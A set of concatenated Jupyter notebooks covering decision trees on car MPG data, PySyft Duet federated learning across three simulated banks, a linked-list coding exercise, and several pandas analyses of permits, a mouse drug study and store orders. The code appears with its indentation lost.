def Decision_Surface(data, col1, col2, target, model, probabilities=False):
# Get bounds
x_min, x_max = data[col1].min(), data[col1].max()
y_min, y_max = data[col2].min(), data[col2].max()
# Create a mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max,0.5), np.arange(y_min, y_max,0.5))
meshed_data = pd.DataFrame(np.c_[xx.ravel(), yy.ravel()])
tdf = data[[col1, col2]]
model.fit(tdf, target)
if probabilities and hasattr(model, "predict_proba"):
# class-1 probability gives a graded surface
Z = model.predict_proba(meshed_data)[:, 1].reshape(xx.shape)
else:
# hard predictions (also the fallback for models without predict_proba, like Lasso)
Z = model.predict(meshed_data).reshape(xx.shape)
plt.figure(figsize=[12,7])
plt.title("Decision surface")
plt.xlabel(col1)
plt.ylabel(col2)
if probabilities:
# Color-scale on the contour (surface = separator)
cs = plt.contourf(xx, yy, Z,cmap=plt.cm.coolwarm, alpha=0.4)
else:
# Only a curve/line on the contour (surface = separator)
cs = plt.contourf(xx, yy, Z, levels=[-1,0,1],cmap=plt.cm.coolwarm, alpha=0.4)
color = ["blue" if t == 0 else "red" for t in target]
plt.scatter(data[col1], data[col2], color=color )
plt.show()
tree_depth=1
Decision_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["is_high_mpg"], DecisionTreeClassifier(max_depth=tree_depth, criterion="entropy"), True)
```
How good is our model? Let's compute accuracy, the percent of times where we correctly identified that a car was high MPG.
```
from sklearn import metrics
print ( "Accuracy = %.3f" % (metrics.accuracy_score(decision_tree.predict(mpg_df[predictor_cols]), mpg_df["is_high_mpg"])) )
```
What are some other ways we could classify the data? Last class we used linear regression; let's see how that partitions the data.
```
from sklearn import linear_model
import warnings
warnings.filterwarnings('ignore')
Decision_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["is_high_mpg"], linear_model.Lasso(alpha=0.01), True)
```
## Decision Tree Regression
Recall our problem from last time: trying to predict the real-valued MPG of each car. In data science, problems where one tries to predict a real-valued number are known as regression. As with classification, much of the intuition for splitting data based on values of known observables applies:
```
from mpl_toolkits.mplot3d import Axes3D
def plot_regression_data(df, info_col_1, info_col_2, target_column):
# Make the plot square
plt.rcParams['figure.figsize'] = [12.0, 8.0]
fig = plt.figure()
ax = fig.add_subplot(projection='3d')
ax.plot_trisurf(df[info_col_1], df[info_col_2], df[target_column], cmap=plt.cm.viridis, linewidth=0.2)
ax.set_xlabel(info_col_1)
ax.set_ylabel(info_col_2)
ax.set_zlabel(target_column);
ax.view_init(60, 45)
plt.show()
plot_regression_data(mpg_df, "acceleration", "weight", "mpg")
```
At a high level, one could imagine splitting the data recursively, assigning an estimated MPG to each side of the split. On more thoughtful reflection, some questions emerge:
- how do we predict a real number at a leaf node given the examples that "filter" to that node?
- how do we assess the effectiveness of a particular split?
As with decision tree classification, there are many valid answers to both of these questions. A typical approach collects all the examples that filter to a leaf, computes their mean target value, and uses that as the prediction. The effectiveness of a split can then be measured by the mean squared difference between the true values and this prediction.
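A sketch of that approach in plain Python (hypothetical helper names, not sklearn's implementation): each side of a candidate split predicts its own mean, and the split is scored by how much it reduces the total squared error.

```
def sse(ys):
    """Sum of squared errors around the mean prediction for a leaf."""
    if not ys:
        return 0.0
    mean = sum(ys) / len(ys)
    return sum((y - mean) ** 2 for y in ys)

def best_regression_split(xs, ys):
    """Choose the threshold that most reduces squared error versus no split."""
    best_t, best_gain = None, 0.0
    for t in sorted(set(xs)):
        left = [y for x, y in zip(xs, ys) if x <= t]
        right = [y for x, y in zip(xs, ys) if x > t]
        if not left or not right:
            continue
        gain = sse(ys) - sse(left) - sse(right)
        if gain > best_gain:
            best_t, best_gain = t, gain
    return best_t, best_gain

# Toy weight/MPG data in the spirit of our dataset
weights = [2000, 2200, 2400, 3200, 3600, 4000]
mpg =     [34.0, 31.0, 30.0, 20.0, 18.0, 15.0]
t, gain = best_regression_split(weights, mpg)
print(t)  # -> 2400 (heavier cars predict lower MPG)
```

This is the regression analogue of information gain: entropy reduction is replaced by squared-error reduction.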
As before, we can easily experiment with decision tree regression models using sklearn:
```
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(max_depth=1, criterion="mse") # note the use of mse (mean squared error) as a criterion
regressor.fit(mpg_df[predictor_cols], mpg_df["mpg"])
visualize_tree(regressor, predictor_cols, ["n", "y"])
```
As before, we can also view the "regression surface"
```
def Regression_Surface(data, col1, col2, target, model):
# Get bounds
x_min, x_max = data[col1].min(), data[col1].max()
y_min, y_max = data[col2].min(), data[col2].max()
# Create a mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max,0.5), np.arange(y_min, y_max,0.5))
meshed_data = pd.DataFrame(np.c_[xx.ravel(), yy.ravel()])
tdf = data[[col1, col2]]
model.fit(tdf, target)
Z = model.predict(meshed_data).reshape(xx.shape)
plt.figure(figsize=[12,7])
plt.title("Regression surface")
plt.xlabel(col1)
plt.ylabel(col2)
cs = plt.contourf(xx, yy, Z, alpha=0.4, cmap=plt.cm.coolwarm)
plt.scatter(data[col1], data[col2], c=target, cmap=plt.cm.coolwarm)
plt.show()
tree_depth=1
Regression_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["mpg"], DecisionTreeRegressor(max_depth=tree_depth, criterion="mse"))
```
Let's also take a look using linear regression!
```
Regression_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["mpg"], linear_model.LinearRegression())
```
How about a more complicated model? Let's try random forest regression!
```
from sklearn.ensemble import RandomForestRegressor
Regression_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["mpg"], RandomForestRegressor(n_estimators=10))
```
|
github_jupyter
|
# Syft Duet for Federated Learning - Central Aggregator
## Setup
First we need to install syft 0.3.0, because every other syft project in this repo uses syft 0.2.9. A recent update removed a lot of the old features and replaced them with the new 'Duet' functionality. To do this, open your terminal, cd into the repo directory, and run:
> pip uninstall syft
Then confirm with 'y' and hit enter.
> pip install syft==0.3.0
NOTE: Make sure that you uninstall syft 0.3.0 and reinstall syft 0.2.9 if you want to run any of the other projects in this repo. Unfortunately, when PySyft updated from 0.2.9 to 0.3.0 it removed all of the FL, DP, and HE functionality that had previously been implemented.
```
# Double check you are using syft 0.3.0 not 0.2.9
# !pip show syft
import syft as sy
import pandas as pd
import torch
```
## Initialising the Duets
```
portuguese_bank_duet = sy.duet("317e830fd06779d42237bcee6483427b")
```
>If the connection is established then there should be a green message above saying 'CONNECTED!'. Ensure the first bank is connected before attempting to connect to the second bank.
```
american_bank_duet = sy.duet("d9de11127f79d32c62aa0566d5807342")
```
>If the connection is established then there should be a green message above saying 'CONNECTED!'. Ensure the first and second banks are connected before attempting to connect to the third bank.
```
australian_bank_duet = sy.duet("a33531fab99dc31aa53c97e3166b5922")
```
>If the connection is established then there should be a green message above saying 'CONNECTED!'. This should mean that you have connected three separate duets to three different 'banks' around the world!
## Check the data exists in each duet
```
portuguese_bank_duet.store.pandas
american_bank_duet.store.pandas
australian_bank_duet.store.pandas
```
>As a proof of concept for the security of this federated learning method: if you want to see or access the data from this side of the connection, you can't without permission. To try this, run:
```python
name_bank_duet.store["tag"].get()
```
>Where you replace 'name' with the specific bank's name and 'tag' with the data tag. This should throw a permissions error and recommend that you request the data from that 'bank'. From here you should run:
```python
name_bank_duet.store["tag"].request()
# Or
name_bank_duet.store["tag"].get(request_block=True)
```
>Now you have sent a request to the 'bank' side of the connection; you must wait until they see this request on their end and type the code:
```python
duet.requests[0].accept()
```
>Once they accept the request, you can freely get the data on this end. However, for federated learning this should never be done explicitly on raw data, only on the results of computation.
## Import Test data
```
test_data = pd.read_csv('datasets/test-data.csv', sep = ',')
test_target = pd.read_csv('datasets/test-target.csv', sep = ',')
test_data.head()
test_data = torch.tensor(test_data.values).float()
test_data
test_target = torch.tensor(test_target.values).float()
test_target
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
test_data = sc_X.fit_transform(test_data)
test_data = torch.tensor(test_data).float()
test_data
```
## Initialise the local Model
```
class LR(sy.Module):
def __init__(self, n_features, torch_ref):
super(LR, self).__init__(torch_ref=torch_ref)
self.lr = torch_ref.nn.Linear(n_features, 1)
def forward(self, x):
out = self.torch_ref.sigmoid(self.lr(x))
return out
local_model = LR(test_data.shape[1], torch)
```
## Send the Model to each connection
```
portuguese_bank_model = local_model.send(portuguese_bank_duet)
american_bank_model = local_model.send(american_bank_duet)
australian_bank_model = local_model.send(australian_bank_duet)
```
### Get the parameters for each model
```
portuguese_bank_parameters = portuguese_bank_model.parameters()
american_bank_parameters = american_bank_model.parameters()
australian_bank_parameters = australian_bank_model.parameters()
```
## Create Local torch of the connections 'remote' torch
```
portuguese_bank_remote_torch = portuguese_bank_duet.torch
american_bank_remote_torch = american_bank_duet.torch
australian_bank_remote_torch = australian_bank_duet.torch
```
### Define each banks optimiser with 'remote' torchs
```
portuguese_bank_optimiser = portuguese_bank_remote_torch.optim.SGD(portuguese_bank_parameters, lr=1)
american_bank_optimiser = american_bank_remote_torch.optim.SGD(american_bank_parameters, lr=1)
australian_bank_optimiser = australian_bank_remote_torch.optim.SGD(australian_bank_parameters, lr=1)
```
### Finally, define the loss criterion for each
```
portuguese_bank_criterion = portuguese_bank_remote_torch.nn.BCELoss()
american_bank_criterion = american_bank_remote_torch.nn.BCELoss()
australian_bank_criterion = australian_bank_remote_torch.nn.BCELoss()
criterions = [portuguese_bank_criterion, american_bank_criterion, australian_bank_criterion]
```
## Train the Models
```
EPOCHS = 25
def train(criterion, epochs=EPOCHS):
for e in range(1, epochs + 1):
# Train Portuguese Bank's Model
portuguese_bank_model.train()
portuguese_bank_optimiser.zero_grad()
portuguese_bank_pred = portuguese_bank_model(portuguese_bank_duet.store[0])
portuguese_bank_loss = criterion[0](portuguese_bank_pred, portuguese_bank_duet.store[1])
portuguese_bank_loss.backward()
portuguese_bank_optimiser.step()
local_portuguese_bank_loss = None
local_portuguese_bank_loss = portuguese_bank_loss.get(
name="loss",
reason="To evaluate training progress",
request_block=True,
timeout_secs=5
)
if local_portuguese_bank_loss is not None:
print("Epoch {}:".format(e))
print("Portuguese Bank Loss: {:.4}".format(local_portuguese_bank_loss))
else:
print("Epoch {}:".format(e))
print("Portuguese Bank Loss: HIDDEN")
# Train American Bank's Model
american_bank_model.train()
american_bank_optimiser.zero_grad()
american_bank_pred = american_bank_model(american_bank_duet.store[0])
american_bank_loss = criterion[1](american_bank_pred, american_bank_duet.store[1])
american_bank_loss.backward()
american_bank_optimiser.step()
local_american_bank_loss = None
local_american_bank_loss = american_bank_loss.get(
name="loss",
reason="To evaluate training progress",
request_block=True,
timeout_secs=5
)
if local_american_bank_loss is not None:
print("American Bank Loss: {:.4}".format(local_american_bank_loss))
else:
print("American Bank Loss: HIDDEN")
# Train Australian Bank's Model
australian_bank_model.train()
australian_bank_optimiser.zero_grad()
australian_bank_pred = australian_bank_model(australian_bank_duet.store[0])
australian_bank_loss = criterion[2](australian_bank_pred, australian_bank_duet.store[1])
australian_bank_loss.backward()
australian_bank_optimiser.step()
local_australian_bank_loss = None
local_australian_bank_loss = australian_bank_loss.get(
name="loss",
reason="To evaluate training progress",
request_block=True,
timeout_secs=5
)
if local_australian_bank_loss is not None:
print("Australian Bank Loss: {:.4}".format(local_australian_bank_loss))
else:
print("Australian Bank Loss: HIDDEN")
return ([portuguese_bank_model, american_bank_model, australian_bank_model])
models = train(criterions)
```
## Localise the models again
```
# As you can see they are all still remote
models
local_portuguese_bank_model = models[0].get(
request_block=True,
name="model_download",
reason="test evaluation",
timeout_secs=5
)
local_american_bank_model = models[1].get(
request_block=True,
name="model_download",
reason="test evaluation",
timeout_secs=5
)
local_australian_bank_model = models[2].get(
request_block=True,
name="model_download",
reason="test evaluation",
timeout_secs=5
)
```
### Average the three models into one local model
```
with torch.no_grad():
local_model.lr.weight.set_(((local_portuguese_bank_model.lr.weight.data + local_american_bank_model.lr.weight.data + local_australian_bank_model.lr.weight.data) / 3))
local_model.lr.bias.set_(((local_portuguese_bank_model.lr.bias.data + local_american_bank_model.lr.bias.data + local_australian_bank_model.lr.bias.data) / 3))
```
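The equal-weight average in the cell above is the simplest case of federated averaging (FedAvg); when clients hold different amounts of data, a sample-count-weighted average is more common. A framework-free sketch (plain Python lists stand in for parameter tensors; all names are illustrative):

```
def weighted_average(param_sets, weights):
    """Average corresponding parameters across clients, weighted by sample counts."""
    total = sum(weights)
    n_params = len(param_sets[0])
    return [
        sum(w * ps[i] for ps, w in zip(param_sets, weights)) / total
        for i in range(n_params)
    ]

# Three clients' versions of the same two scalar parameters, weighted by dataset size.
client_params = [[1.0, 4.0], [2.0, 5.0], [3.0, 6.0]]
sample_counts = [100, 100, 200]
print(weighted_average(client_params, sample_counts))  # -> [2.25, 5.25]
```

With equal weights this reduces to the plain mean used above; with real tensors you would apply the same weighted sum per parameter.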
## Test the accuracy on the test set
```
def accuracy(model, x, y):
out = model(x)
correct = torch.abs(y - out) < 0.5
return correct.float().mean()
plain_accuracy = accuracy(local_model, test_data, test_target)
print(f"Accuracy on plain test_set: {plain_accuracy}")
```
|
github_jupyter
|
This notebook was prepared by [Donne Martin](http://donnemartin.com). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges).
# Challenge Notebook
## Problem: Find the kth to last element of a linked list.
* [Constraints](#Constraints)
* [Test Cases](#Test-Cases)
* [Algorithm](#Algorithm)
* [Code](#Code)
* [Unit Test](#Unit-Test)
* [Solution Notebook](#Solution-Notebook)
## Constraints
* Can we assume this is a non-circular, singly linked list?
* Yes
* Can we assume k is a valid integer?
* Yes
* If k = 0, does this return the last element?
* Yes
* What happens if k is greater than or equal to the length of the linked list?
* Return None
* Can you use additional data structures?
* No
* Can we assume we already have a linked list class that can be used for this problem?
* Yes
## Test Cases
* Empty list -> None
* k is >= the length of the linked list -> None
* One element, k = 0 -> element
* General case with many elements, k < length of linked list
## Algorithm
Refer to the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/linked_lists/kth_to_last_elem/kth_to_last_elem_solution.ipynb). If you are stuck and need a hint, the solution notebook's algorithm discussion might be a good place to start.
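If you want to see the shape of one classic approach before opening the solution notebook (a standalone sketch with its own minimal `Node` class rather than the repo's linked list class, and it may not match the official solution): advance a lead pointer k+1 nodes, then move lead and trail pointers together until the lead runs off the end.

```
class Node:
    """Minimal singly linked node, standing in for the repo's linked list class."""
    def __init__(self, data, next_node=None):
        self.data = data
        self.next = next_node

def kth_to_last(head, k):
    """Two runners spaced k apart; O(n) time, O(1) space, no extra structures."""
    lead = head
    for _ in range(k + 1):      # advance lead k+1 nodes (k = 0 means last element)
        if lead is None:
            return None         # empty list, or k >= length of the list
        lead = lead.next
    trail = head
    while lead is not None:     # when lead falls off, trail is kth from the end
        lead = lead.next
        trail = trail.next
    return trail.data

head = Node(7, Node(5, Node(3, Node(1, Node(2)))))   # 7 -> 5 -> 3 -> 1 -> 2
print(kth_to_last(head, 2))   # -> 3
```

This satisfies the constraints above: no additional data structures, None for an empty list or k >= length, and k = 0 yields the last element.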
## Code
```
%run ../linked_list/linked_list.py
%load ../linked_list/linked_list.py
class MyLinkedList(LinkedList):
def kth_to_last_elem(self, k):
# TODO: Implement me
pass
```
## Unit Test
**The following unit test is expected to fail until you solve the challenge.**
```
# %load test_kth_to_last_elem.py
import unittest
class Test(unittest.TestCase):
def test_kth_to_last_elem(self):
print('Test: Empty list')
linked_list = MyLinkedList(None)
self.assertEqual(linked_list.kth_to_last_elem(0), None)
print('Test: k >= len(list)')
self.assertEqual(linked_list.kth_to_last_elem(100), None)
print('Test: One element, k = 0')
head = Node(2)
linked_list = MyLinkedList(head)
self.assertEqual(linked_list.kth_to_last_elem(0), 2)
print('Test: General case')
linked_list.insert_to_front(1)
linked_list.insert_to_front(3)
linked_list.insert_to_front(5)
linked_list.insert_to_front(7)
self.assertEqual(linked_list.kth_to_last_elem(2), 3)
print('Success: test_kth_to_last_elem')
def main():
test = Test()
test.test_kth_to_last_elem()
if __name__ == '__main__':
main()
```
## Solution Notebook
Review the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/linked_lists/kth_to_last_elem/kth_to_last_elem_solution.ipynb) for a discussion on algorithms and code solutions.
|
github_jupyter
|
```
# import data science libraries
import numpy as np
import pandas as pd
import re
import os.path
from os import path
from datetime import datetime
%matplotlib inline
import matplotlib.pyplot as plt
import seaborn as sns
from scipy import stats
from sklearn.preprocessing import MinMaxScaler, StandardScaler, PowerTransformer
from sklearn.cluster import KMeans
import wrangle as wr
import preprocessing_permits as pr
import explore as ex
import model as mo
import warnings
warnings.filterwarnings("ignore")
# global setting for DataFrames and visualizations
pd.set_option("display.max_columns", None)
plt.rc("figure", figsize=(16, 8))
sns.set_palette("colorblind")
df = wr.acquire_building_permits()
print(f"""Our DataFrame contains {df.shape[0]:,} observations and {df.shape[1]} features.""")
df
df["city"] = df.cbsa_name.str.split(" ", 1, expand = True)[0]
df["state"] = df.cbsa_name.str.split(" ", 1, expand = True)[1]
df["major_city"] = df.city.str.split("-", 1, expand=True)[0]
df["major_state"] = df.state.str.split("-", 1, expand=True)[0]
df["metropolitan_area"] = df.state.str.split("-", 1, expand=True)[1]
df["metropolitan_area"] = df.major_state.str.split(" ", 1, expand=True)[1]
df["major_state"] = df.major_state.str.split(" ", 1, expand=True)[0]
df[(df.major_city == "York") & (df.major_state == "PA")]
df = wr.prep_building_permits(df)
print(f"""Our DataFrame contains {df.shape[0]:,} observations and {df.shape[1]} features.""")
df
df[(df.major_city == "York") & (df.major_state == "PA")]
df[(df.major_city == "Baltimore") & (df.major_state == "MD")]
df.head(46)
df = pr.get_permits_model_df()
print(f"""Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features""")
df.head(46)
df["alec_test"] = (
df.sort_values(["year"])
.groupby(["city", "state"])[["total_high_density_value"]]
.pct_change()
)
df.tail(46)
df["new_field"] = df.sort_values(["year"]).groupby(["city", "state", "year"])[["total_high_density_value"]].pct_change()
(7485000.0 - 4566000.0) / 4566000.0
(12492000.0 - 30583000.0) / 30583000.0
(1 + 2.034637) / (1 + 0.231085)
df = pr.add_new_features(df)
print(f"""Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features""")
df.head(46)
(1 + -0.379118) / (1 + 0.062322)
df.groupby("year").total_high_density_value.sum()
df.sample()
df.iloc[545:550]
(4.928300e+10 - 5.200240e+10) / 5.200240e+10
(217714000 - 473328000.0) / 473328000.0
(1 + 0.578019) / (1 + 0.313639)
df = pr.filter_top_cities_building_permits(df)
print(f"""Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features""")
df.tail()
(4.928300e+10 - 5.200240e+10) / 5.200240e+10
(1 + -0.508320) / (1 + -0.052294)
df.groupby("year").total_high_density_value.sum()
```
|
github_jupyter
|
## Observations and Insights
```
# Dependencies and Setup
import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats as st
import numpy as np
from scipy.stats import linregress
# Study data files
mouse_metadata_path = "data/Mouse_metadata.csv"
study_results_path = "data/Study_results.csv"
# Read the mouse data and the study results
mouse_metadata = pd.read_csv(mouse_metadata_path)
study_results = pd.read_csv(study_results_path)
#looking at the data
# mouse_metadata.head(20)
# study_results.head(20)
#putting data together
all_mouse_data = mouse_metadata.merge(study_results, on='Mouse ID')
all_mouse_data.head()
# Checking the number of mice.
mouse_count = len(all_mouse_data["Mouse ID"].unique())
mouse_count
# Getting the duplicate mice by ID number that shows up for Mouse ID and Timepoint.
all_dups = len(all_mouse_data["Mouse ID"])- mouse_count
all_dups
# Optional: Get all the data for the duplicate mouse ID.
all_counts = all_dups + mouse_count
all_counts
# Find the duplicate mouse
duplicate_mouse = all_mouse_data.loc[all_mouse_data.duplicated(subset=['Mouse ID', 'Timepoint']), 'Mouse ID'].unique()
duplicate_mouse[0]
# Create a clean DataFrame by dropping the duplicate mouse by its ID.
analysis_df = all_mouse_data[all_mouse_data['Mouse ID'].isin(duplicate_mouse) == False]
analysis_df.head()
# Checking the number of mice in the clean DataFrame.
mouse_count2 = len(analysis_df["Mouse ID"].unique())
mouse_count2
```
## Summary Statistics
```
# Generate a summary statistics table of mean, median, variance, standard deviation, and SEM of the tumor volume for each regimen
# This method is the most straightforward, creating multiple series and putting them all together at the end.
regimen_df = analysis_df.copy().groupby('Drug Regimen')
mean = regimen_df.mean()['Tumor Volume (mm3)']
median = regimen_df.median()['Tumor Volume (mm3)']
variance = regimen_df.var()['Tumor Volume (mm3)']
std_deviation = regimen_df.std()['Tumor Volume (mm3)']
sem = regimen_df.sem()['Tumor Volume (mm3)']
summary_table = pd.DataFrame({
'Mean Volume': mean,
'Median Volume': median,
'Volume Variance': variance,
'Volume Std': std_deviation,
'Volume Std Err': sem
})
summary_table
# Generate a summary statistics table of mean, median, variance, standard deviation,
# and SEM of the tumor volume for each regimen
# This method produces everything in a single groupby function
analysis_df.groupby('Drug Regimen').agg({
'Tumor Volume (mm3)': ['mean', 'median', 'var', 'std', 'sem']
})
```
## Bar and Pie Charts
```
# Generate a bar plot showing the total number of mice for each treatment throughout the course of the study using pandas.
pandas_bar = analysis_df['Drug Regimen'].value_counts().plot(kind='bar', color = 'pink', title="Mouse Count Per Treatment")
# Generate a bar plot showing the total number of mice for each treatment throughout the course of the study using pyplot.
x_values = analysis_df['Drug Regimen'].unique()
plt.bar(x=x_values, height=analysis_df['Drug Regimen'].value_counts().values, color="pink", width=0.5)
plt.xticks(rotation=90)
plt.title("Mouse Count Per Treatment")
plt.show()
# Generate a pie plot showing the distribution of female versus male mice using pandas
gender_dist = analysis_df['Sex'].value_counts()
gender_pie = gender_dist.plot(kind='pie', colors = ["purple", "pink"], title= "Gender Distribution", legend=True)
# Generate a pie plot showing the distribution of female versus male mice using pyplot
gender_counts = analysis_df['Sex'].value_counts()
plt.pie(gender_counts, labels=gender_dist.index, colors=["purple", "pink"])
plt.title('Gender Distribution')
plt.legend()
plt.ylabel("Sex")
plt.show()
```
## Quartiles, Outliers and Boxplots
```
# Start by getting the last (greatest) timepoint for each mouse
# Using reset_index will return the series as a dataframe
max_df = analysis_df.groupby('Mouse ID')['Timepoint'].max().reset_index()
max_df
# Merge this group df with the original dataframe to get the tumor volume at the last timepoint
max_merge = analysis_df.merge(max_df, on=['Mouse ID', 'Timepoint'])
max_merge
# Put treatments into a list for for loop (and later for plot labels)
treatments = ["Capomulin", "Ramicane", "Infubinol", "Ceftamin"]
# Create empty list to fill with tumor vol data (for plotting)
tumor_vol = []
# Calculate the IQR and quantitatively determine if there are any potential outliers.
# Locate the rows which contain mice on each drug and get the tumor volumes
# Determine outliers using upper and lower bounds
for treatment in treatments:
final_volume = (max_merge.loc[max_merge["Drug Regimen"]== treatment, "Tumor Volume (mm3)"])
quartiles = np.quantile(final_volume, [0.25, 0.50, 0.75])
lowerq = quartiles[0]
higherq = quartiles[2]
median = quartiles[1]
iqr = higherq - lowerq
lower_bound = lowerq - (1.5 * iqr)
upper_bound = higherq + (1.5 * iqr)
print(f'Quartile Data for {treatment}:')
print("------------------------------------------")
print(f'Lower Quartile of Tumor Volumes: {round(lowerq, 2)}')
print(f'Upper Quartile of Tumor Volumes: {round(higherq, 2)}')
print(f'Interquartile Range is: {round(iqr, 2)}')
print(f'Values below {round(lower_bound, 2)} could be outliers, and values above {round(upper_bound, 2)} could be outliers')
print("------------------------------------------")
tumor_vol.append(final_volume)
# Generate a box plot of the final tumor volume of each mouse across four regimens of interest
pink_square = dict(markerfacecolor='pink', marker='s')
fig, ax1 = plt.subplots()
ax1.set_title("Tumor Volume Across Four Regimens of Interest")
ax1.set_ylabel("Volume")
ax1.set_xlabel("Treatments")
ax1.boxplot(tumor_vol, flierprops=pink_square )
ax1.set_xticklabels(["Capomulin", "Ramicane", "Infubinol", "Ceftamin"])
plt.show()
```
## Line and Scatter Plots
```
rando_mouse_df = analysis_df.loc[analysis_df['Drug Regimen']== "Capomulin",:]
rando_mouse_df = rando_mouse_df.loc[rando_mouse_df["Mouse ID"]=="s185",:]
# Generate a line plot of time point versus tumor volume for a mouse treated with Capomulin
plt.plot(rando_mouse_df["Tumor Volume (mm3)"], rando_mouse_df["Timepoint"], marker = "o", color="purple")
plt.xlabel('Tumor Volume (mm3)')
plt.ylabel('Timepoints')
plt.title("Tumor Volume vs Time for Mouse s185")
plt.show()
# Generate a scatter plot of mouse weight versus average tumor volume for the Capomulin regimen
capomulin_df = analysis_df.copy().loc[analysis_df['Drug Regimen']== "Capomulin",:]
capomulin_df = capomulin_df.groupby("Mouse ID")
avg_vol = capomulin_df["Tumor Volume (mm3)"].mean()
mouse_weight = capomulin_df["Weight (g)"].first()  # weight is constant per mouse, so take the first value per group
plt.scatter(avg_vol, mouse_weight, color="hotpink")
plt.xlabel('Average Tumor Volume')
plt.ylabel('Mouse Weight (g)')
plt.title("Tumor Volume vs Weight")
plt.show()
```
## Correlation and Regression
```
# Calculate the correlation coefficient and linear regression model
# for mouse weight and average tumor volume for the Capomulin regimen
x_values = avg_vol
y_values = mouse_weight
(slope, intercept, rvalue, pvalue, stderr) = linregress(x_values, y_values)
regress_values = x_values * slope + intercept
line_eq = "y = " + str(round(slope,2)) + "x + " + str(round(intercept,2))
correlation = st.pearsonr(avg_vol, mouse_weight)
print(f'The equation of the line is {line_eq}, and the correlation coefficient is {round(correlation[0],2)}.')
print('This indicates a strong relationship between weight and tumor volume.')
```
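As a sanity check on the relationship used above: the `rvalue` returned by `linregress` is the same Pearson correlation coefficient that `st.pearsonr` computes. A minimal sketch on synthetic data (not the mouse data):

```python
import numpy as np
from scipy.stats import linregress, pearsonr

# synthetic linear data with noise
rng = np.random.default_rng(0)
x = rng.normal(size=50)
y = 2.0 * x + rng.normal(scale=0.5, size=50)

slope, intercept, rvalue, pvalue, stderr = linregress(x, y)
r, p = pearsonr(x, y)
print(round(rvalue, 6), round(r, 6))  # the two r values agree
```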
---
```
# importing the packages
import pandas as pd
import numpy as np
# reading the csv files
orders = pd.read_csv('orders_test (2).csv')
stores = pd.read_csv('store_test (2).csv')
customers = pd.read_csv('customer_test (2).csv')
```
1. Create a CSV containing an aggregate table showing the total orders and revenue each store had each month. It should have the following columns:
   - Year (e.g. 2020)
   - Month (e.g. January)
   - Store Name
   - Number of Orders
   - Total Revenue
```
# renaming, creating, merging columns as per required output
stores.rename(columns={'id':'store_id'},inplace=True)
orders['order_date'] = pd.to_datetime(orders['order_date'])
orders['Year'] = orders['order_date'].apply(lambda x : x.strftime('%Y'))
orders['Month'] = orders['order_date'].apply(lambda x : x.strftime('%B'))
store_orders = stores.merge(orders, on=['store_id'], how = 'left')
# aggregating orders and revenue per store per month, and storing the result for question 1
Q1 = store_orders.groupby(['name','Year','Month']).agg({'id':'count','total':'sum'}).reset_index().rename(columns={
    'name':'Store Name','id':'Number of Orders','total':'Total Revenue'})
Q1
Q1.to_csv('Q1.csv')
```
2. Create a CSV containing a list of users who have placed fewer than 10 orders. It should have the following columns:
   - First Name
   - Last Name
   - Email
   - Orders Placed by user
```
# renaming, merging columns as per required output
customers.rename(columns={'id':'customer_id'},inplace=True)
customer_orders = customers.merge(orders,on='customer_id',how='left')
customers_with_orders = customer_orders.groupby(['first_name','last_name','email']).agg({'id':'count'}).reset_index().rename(
columns={'first_name':'First Name','last_name':'Last Name','email':'Email','id':'Orders Placed by user'})
# pulling info for customers who have placed fewer than 10 orders
# (.copy() avoids a SettingWithCopyWarning when the Email column is modified later)
customers_with_lt_10_orders = customers_with_orders[customers_with_orders['Orders Placed by user'] < 10].copy()
customers_with_lt_10_orders
# saving the results of Q2
customers_with_lt_10_orders.to_csv('Q2.csv')
```
3. In question 2, use an MD5 hash to encrypt the emails of the users before converting it to CSV.
```
# importing the hash library
import hashlib
# hashing the Email information of each customer
customers_with_lt_10_orders['Email']=customers_with_lt_10_orders.Email.apply(lambda x: hashlib.md5(x.encode()).hexdigest())
customers_with_lt_10_orders
# storing the customer order info with hashed Email information
customers_with_lt_10_orders.to_csv('Q3.csv')
```
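One caveat worth noting: MD5 is a one-way hash, not encryption, so the digests cannot be reversed, and identical emails always map to the same digest (which is what makes the anonymized column still joinable). A minimal sketch of the hashing step on a throwaway string:

```python
import hashlib

def md5_hex(text):
    # Deterministic one-way digest; identical inputs always map to the same hash.
    return hashlib.md5(text.encode()).hexdigest()

print(md5_hex("hello"))  # 5d41402abc4b2a76b9719d911017c592
```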
---
```
#!/bin/python
import numpy as np
import pandas as pd
import os
import pickle
import sys
import scipy
from pathlib import Path
from collections import Counter
import random
import copy
# Machine Learning libraries
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn import svm
from sklearn import metrics
from sklearn import preprocessing
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.metrics import average_precision_score
#m_trn_file_path = "../cnn_bow/cnn_trn.csv"
#m_val_file_path = "../cnn_bow/cnn_val.csv"
#m_test_file_path = "../cnn_bow/cnn_test.csv"
m_trn_file_path = "../surf_bow/surf_1000_trn.csv"
m_val_file_path = "../surf_bow/surf_1000_val.csv"
m_test_file_path = "../surf_bow/surf_1000_test.csv"
#a_train_df = pd.read_csv(a_trn_file_path, index_col='Unnamed: 0')
#a_train_df.drop(['target', 'name'], axis=1, inplace=True)
m_train_df = pd.read_csv(m_trn_file_path, index_col='Unnamed: 0')
m_train_df.drop(['name'], axis=1, inplace=True)
train_df = m_train_df
train_df.target.fillna('P000', inplace=True)
